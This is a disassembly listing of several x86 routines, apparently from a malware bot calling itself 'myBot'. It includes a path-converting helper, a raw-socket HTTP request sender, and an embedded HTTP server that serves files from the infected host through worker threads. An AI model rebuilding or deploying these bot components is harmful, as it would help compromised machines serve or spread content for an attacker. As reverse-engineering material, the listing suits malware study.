Assembly Code of File sub_403B4C
sub_403879 proc near ; CODE XREF: sub_403B4C + 182�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ ebp + arg_0 ]
push ebx
mov ecx, eax
push esi
xor esi, esi
lea edx, [ ecx + 1 ]
loc_403888: ; CODE XREF: sub_403879 + 14�j
mov bl, [ ecx ]
inc ecx
test bl, bl
jnz short loc_403888
sub ecx, edx
mov [ ebp + arg_0 ], ecx
jz short loc_4038B3
loc_403896: ; CODE XREF: sub_403879 + 38�j
cmp byte ptr [ esi + eax ], 5Ch
jnz short loc_4038A0
mov byte ptr [ esi + eax ], 2Fh
loc_4038A0: ; CODE XREF: sub_403879 + 21�j
mov ecx, eax
inc esi
lea edx, [ ecx + 1 ]
loc_4038A6: ; CODE XREF: sub_403879 + 32�j
mov bl, [ ecx ]
inc ecx
test bl, bl
jnz short loc_4038A6
sub ecx, edx
cmp esi, ecx
jb short loc_403896
loc_4038B3: ; CODE XREF: sub_403879 + 1B�j
pop esi
pop ebx
pop ebp
retn
sub_403879 endp
########################## SUBROUTINE ##########################
sub_4038B7 proc near ; CODE XREF: sub_4078FA + 4DC0�p
var_4A4 = byte ptr - 4A4h
var_314 = byte ptr - 314h
var_114 = byte ptr - 114h
var_14 = word ptr - 14h
var_12 = word ptr - 12h
var_10 = dword ptr - 10h
var_4 = dword ptr - 4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A4h
push edi
lea eax, [ ebp + var_4A4 ]
push eax
push 101h
call dword_4334B0 ; WSAStartup
push 6
push 1
push 2
call dword_4334A0 ; socket
push [ ebp + arg_14 ]
mov [ ebp + var_4 ], eax
xor eax, eax
lea edi, [ ebp + var_14 ]
stosd
stosd
stosd
stosd
mov [ ebp + var_14 ], 2
call dword_4335EC ; ntohs
push [ ebp + arg_10 ]
mov [ ebp + var_12 ], ax
call sub_406B1D
pop ecx
mov [ ebp + var_10 ], eax
push 10h
lea eax, [ ebp + var_14 ]
push eax
push [ ebp + var_4 ]
call dword_433458 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_403997
mov eax, [ ebp + arg_20 ]
test eax, eax
jnz short loc_40392A
mov eax, (offset asc_41FA74 + 2)
loc_40392A: ; CODE XREF: sub_4038B7 + 6C�j
push ebx
push esi
push [ ebp + arg_10 ]
mov ebx, 100h
push eax
push [ ebp + arg_1C ]
lea eax, [ ebp + var_114 ]
push [ ebp + arg_18 ]
push offset aSSHttp1_1Refer ; \"%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon\"...
push ebx
push eax
call sub_412E0D
lea eax, [ ebp + var_114 ]
add esp, 1Ch
lea esi, [ eax + 1 ]
loc_403959: ; CODE XREF: sub_4038B7 + A7�j
mov cl, [ eax ]
inc eax
test cl, cl
jnz short loc_403959
push 0
sub eax, esi
push eax
lea eax, [ ebp + var_114 ]
push eax
push [ ebp + var_4 ]
call dword_433534 ; send
push 40h
pop ecx
push 0
push ebx
lea eax, [ ebp + var_114 ]
push eax
push [ ebp + var_4 ]
xor esi, esi
lea edi, [ ebp + var_114 ]
rep movsd
call dword_433414 ; recv
pop esi
pop ebx
loc_403997: ; CODE XREF: sub_4038B7 + 65�j
push [ ebp + var_4 ]
call dword_4335AC ; closesocket
call dword_4335B8 ; WSACleanup
lea eax, [ ebp + var_114 ]
push eax
lea eax, [ ebp + var_314 ]
push eax
call sub_412BB5
cmp [ ebp + arg_C ], 0
pop ecx
pop ecx
pop edi
jnz short locret_4039DC
push 0
push [ ebp + arg_8 ]
lea eax, [ ebp + var_314 ]
push eax
push [ ebp + arg_4 ]
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 14h
locret_4039DC: ; CODE XREF: sub_4038B7 + 109�j
leave
retn
sub_4038B7 endp
########################## SUBROUTINE ##########################
sub_4039DE proc near ; DATA XREF: sub_403B4C + 24E�o
var_1654 = byte ptr - 1654h
var_654 = byte ptr - 654h
var_550 = byte ptr - 550h
var_44C = dword ptr - 44Ch
var_3C8 = byte ptr - 3C8h
var_2C4 = byte ptr - 2C4h
var_B8 = dword ptr - 0B8h
var_B4 = dword ptr - 0B4h
var_A4 = dword ptr - 0A4h
var_9C = byte ptr - 9Ch
var_68 = byte ptr - 68h
var_20 = byte ptr - 20h
arg_0 = dword ptr 8
push ebp
mov eax, 1654h
lea ebp, [ esp - 74h ]
call sub_412DD0
mov eax, [ ebp + 74h + arg_0 ]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ ebp + 74h + var_44C ]
rep movsd
mov dword ptr [ eax + 3ACh ], 1
lea eax, [ ebp + 74h + var_3C8 ]
push eax
lea eax, [ ebp + 74h + var_550 ]
push eax
call sub_412BB5
lea eax, [ ebp + 74h + var_2C4 ]
push eax
lea eax, [ ebp + 74h + var_654 ]
push eax
call sub_412BB5
xor ebx, ebx
add esp, 10h
cmp [ ebp + 74h + var_A4 ], ebx
lea eax, [ ebp + 74h + var_9C ]
jz short loc_403A46
push offset aTextHtml ; \"text/html\"
jmp short loc_403A4B
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_403A46: ; CODE XREF: sub_4039DE + 5F�j
push offset aApplicationOct ; \"application/octet - stream\"
loc_403A4B: ; CODE XREF: sub_4039DE + 66�j
push eax
call sub_412BB5
pop ecx
pop ecx
push 46h
lea eax, [ ebp + 74h + var_68 ]
push eax
push offset aDddDdMmmYyyy ; \"ddd, dd MMM yyyy\"
push ebx
push ebx
mov esi, 409h
push esi
call ds:dword_41F068 ; GetDateFormatA
push 1Eh
lea eax, [ ebp + 74h + var_20 ]
push eax
push offset aHhMmSs ; \"HH:mm:ss\"
push ebx
push ebx
push esi
call ds:dword_41F064 ; GetTimeFormatA
cmp [ ebp + 74h + var_B8 ], 0FFFFFFFFh
lea eax, [ ebp + 74h + var_20 ]
push eax
lea eax, [ ebp + 74h + var_68 ]
push eax
lea eax, [ ebp + 74h + var_20 ]
push eax
lea eax, [ ebp + 74h + var_68 ]
push eax
lea eax, [ ebp + 74h + var_20 ]
push eax
lea eax, [ ebp + 74h + var_68 ]
push eax
lea eax, [ ebp + 74h + var_9C ]
jnz short loc_403AB8
push eax
lea eax, [ ebp + 74h + var_1654 ]
push offset aHttp1_0200OkSe ; \"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache - C\"...
push eax
call sub_412BB5
add esp, 24h
jmp short loc_403AD0
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_403AB8: ; CODE XREF: sub_4039DE + C1�j
push [ ebp + 74h + var_B8 ]
push eax
lea eax, [ ebp + 74h + var_1654 ]
push offset aHttp1_0200Ok_0 ; \"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache - C\"...
push eax
call sub_412BB5
add esp, 28h
loc_403AD0: ; CODE XREF: sub_4039DE + D8�j
lea eax, [ ebp + 74h + var_1654 ]
lea edx, [ eax + 1 ]
loc_403AD9: ; CODE XREF: sub_4039DE + 100�j
mov cl, [ eax ]
inc eax
cmp cl, bl
jnz short loc_403AD9
push ebx
sub eax, edx
push eax
lea eax, [ ebp + 74h + var_1654 ]
push eax
push [ ebp + 74h + var_44C ]
call dword_433534 ; send
cmp [ ebp + 74h + var_A4 ], ebx
jnz short loc_403B12
lea eax, [ ebp + 74h + var_550 ]
push eax
push [ ebp + 74h + var_44C ]
call sub_4037B8
pop ecx
pop ecx
jmp short loc_403B2F
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_403B12: ; CODE XREF: sub_4039DE + 11C�j
lea eax, [ ebp + 74h + var_654 ]
push eax
push ebx
push [ ebp + 74h + var_44C ]
lea eax, [ ebp + 74h + var_550 ]
push eax
call sub_4030C4
add esp, 10h
loc_403B2F: ; CODE XREF: sub_4039DE + 132�j
push [ ebp + 74h + var_44C ]
call dword_4335AC ; closesocket
push [ ebp + 74h + var_B4 ]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_4039DE endp ; sp - analysis failed
########################## SUBROUTINE ##########################
sub_403B4C proc near ; CODE XREF: sub_403E06 + 37C�p
var_8C4 = byte ptr - 8C4h
var_6C4 = dword ptr - 6C4h
var_640 = byte ptr - 640h
var_53C = byte ptr - 53Ch
var_330 = dword ptr - 330h
var_32C = dword ptr - 32Ch
var_31C = dword ptr - 31Ch
var_318 = dword ptr - 318h
var_314 = byte ptr - 314h
var_211 = byte ptr - 211h
var_210 = byte ptr - 210h
var_10C = byte ptr - 10Ch
var_10B = byte ptr - 10Bh
var_10A = byte ptr - 10Ah
var_8 = byte ptr - 8
var_4 = dword ptr - 4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
push 41h
xor eax, eax
pop ecx
lea edi, [ ebp + var_210 ]
rep stosd
mov eax, [ ebp + arg_8 ]
xor esi, esi
cmp byte ptr [ eax ], 2Fh
mov [ ebp + var_4 ], esi
push eax
jz short loc_403B7A
push offset aS_6 ; \"\\%s\"
jmp short loc_403B82
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_403B7A: ; CODE XREF: sub_403B4C + 25�j
mov byte ptr [ eax ], 5Ch
push offset aS_1 ; \"%s\"
loc_403B82: ; CODE XREF: sub_403B4C + 2C�j
lea eax, [ ebp + var_10C ]
push eax
call sub_412BB5
lea eax, [ ebp + var_10C ]
add esp, 0Ch
xor edi, edi
lea ecx, [ eax + 1 ]
loc_403B9C: ; CODE XREF: sub_403B4C + 55�j
mov dl, [ eax ]
inc eax
test dl, dl
jnz short loc_403B9C
sub eax, ecx
mov [ ebp + arg_8 ], eax
jz short loc_403C22
push 2
pop ebx
loc_403BAD: ; CODE XREF: sub_403B4C + D4�j
lea eax, [ ebp + var_10C ]
lea edx, [ eax + 1 ]
loc_403BB6: ; CODE XREF: sub_403B4C + 6F�j
mov cl, [ eax ]
inc eax
test cl, cl
jnz short loc_403BB6
sub eax, edx
cmp ebx, eax
jnb short loc_403BEF
cmp [ ebp + esi + var_10C ], 25h
jnz short loc_403BEF
cmp [ ebp + esi + var_10B ], 32h
jnz short loc_403BEF
cmp [ ebp + esi + var_10A ], 30h
jnz short loc_403BEF
inc esi
inc esi
inc ebx
mov [ ebp + edi + var_210 ], 20h
inc ebx
jmp short loc_403C09
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_403BEF: ; CODE XREF: sub_403B4C + 75�j
; sub_403B4C + 7F�j ...
mov al, [ ebp + esi + var_10C ]
cmp al, 2Fh
jnz short loc_403BFF
push 5Ch
pop eax
jmp short loc_403C02
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_403BFF: ; CODE XREF: sub_403B4C + AC�j
movsx eax, al
loc_403C02: ; CODE XREF: sub_403B4C + B1�j
mov [ ebp + edi + var_210 ], al
loc_403C09: ; CODE XREF: sub_403B4C + A1�j
inc esi
lea eax, [ ebp + var_10C ]
inc ebx
inc edi
lea ecx, [ eax + 1 ]
loc_403C15: ; CODE XREF: sub_403B4C + CE�j
mov dl, [ eax ]
inc eax
test dl, dl
jnz short loc_403C15
sub eax, ecx
cmp esi, eax
jb short loc_403BAD
loc_403C22: ; CODE XREF: sub_403B4C + 5C�j
lea eax, [ ebp + var_210 ]
push eax
push [ ebp + arg_4 ]
lea eax, [ ebp + var_314 ]
push offset aSS ; \"%s%s\"
push eax
call sub_412BB5
lea eax, [ ebp + var_314 ]
push offset asc_420328 ; \"\n\"
push eax
call sub_413859
add esp, 18h
lea eax, [ ebp + var_314 ]
push eax
call ds:dword_41F06C ; GetFileAttributesA
xor ebx, ebx
inc ebx
cmp eax, 10h
jz short loc_403C73
cmp eax, 0FFFFFFFFh
jnz short loc_403C76
push [ ebp + arg_0 ]
jmp loc_403CFB
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_403C73: ; CODE XREF: sub_403B4C + 118�j
mov [ ebp + var_4 ], ebx
loc_403C76: ; CODE XREF: sub_403B4C + 11D�j
cmp [ ebp + edi + var_211 ], 5Ch
jnz short loc_403C83
mov [ ebp + var_4 ], ebx
loc_403C83: ; CODE XREF: sub_403B4C + 132�j
mov eax, [ ebp + arg_0 ]
xor edi, edi
cmp [ ebp + var_4 ], edi
mov [ ebp + var_6C4 ], eax
mov [ ebp + var_318 ], edi
jz short loc_403D06
cmp [ ebp + arg_C ], edi
jz short loc_403CFA
lea edi, [ ebp + var_314 ]
dec edi
loc_403CA5: ; CODE XREF: sub_403B4C + 15F�j
mov al, [ edi + 1 ]
inc edi
test al, al
jnz short loc_403CA5
lea eax, [ ebp + var_314 ]
push eax
lea eax, [ ebp + var_640 ]
mov esi, offset asc_4205E4 ; \" * \"
push eax
movsw
call sub_412BB5
lea eax, [ ebp + var_210 ]
push eax
call sub_403879
lea eax, [ ebp + var_210 ]
push eax
lea eax, [ ebp + var_53C ]
push eax
call sub_412BB5
or [ ebp + var_330 ], 0FFFFFFFFh
add esp, 14h
mov [ ebp + var_31C ], ebx
xor edi, edi
jmp short loc_403D55
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_403CFA: ; CODE XREF: sub_403B4C + 150�j
push eax
loc_403CFB: ; CODE XREF: sub_403B4C + 122�j
call dword_4335AC ; closesocket
jmp loc_403DED
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_403D06: ; CODE XREF: sub_403B4C + 14B�j
push edi
push edi
push 3
push edi
push ebx
push 80000000h
lea eax, [ ebp + var_314 ]
push eax
call ds:dword_41F03C ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_403D55
lea eax, [ ebp + var_314 ]
push eax
lea eax, [ ebp + var_640 ]
push eax
call sub_412BB5
pop ecx
pop ecx
push edi
push esi
mov [ ebp + var_31C ], edi
call ds:dword_41F060 ; GetFileSize
push esi
mov [ ebp + var_330 ], eax
call ds:dword_41F034 ; CloseHandle
loc_403D55: ; CODE XREF: sub_403B4C + 1AC�j
; sub_403B4C + 1D7�j
mov esi, [ ebp + arg_10 ]
push esi
lea eax, [ ebp + var_8C4 ]
push offset aHttpdWorkerThr ; \"[ HTTPD ]: Worker thread of server thread\"...
push eax
call sub_412BB5
push edi
lea eax, [ ebp + var_8C4 ]
push 4
push eax
call sub_410EEA
mov [ ebp + var_32C ], eax
imul eax, 234h
add esp, 18h
mov dword_43433C[ eax ], esi
lea eax, [ ebp + var_8 ]
push eax
push edi
lea eax, [ ebp + var_6C4 ]
push eax
push offset sub_4039DE
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ ebp + var_32C ]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ ecx ], eax
jnz short loc_403DFC
push [ ebp + arg_0 ]
call dword_4335AC ; closesocket
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ ebp + var_8C4 ]
push offset aHttpdFailedT_0 ; \"[ HTTPD ]: Failed to start worker thread,\"...
push eax
call sub_412BB5
lea eax, [ ebp + var_8C4 ]
push eax
call sub_401C33
add esp, 10h
loc_403DED: ; CODE XREF: sub_403B4C + 1B5�j
; sub_403B4C + 2B8�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_403DF4: ; CODE XREF: sub_403B4C + 2B6�j
push 5
call ds:dword_41F000 ; Sleep
loc_403DFC: ; CODE XREF: sub_403B4C + 26F�j
cmp [ ebp + var_318 ], edi
jz short loc_403DF4
jmp short loc_403DED
sub_403B4C endp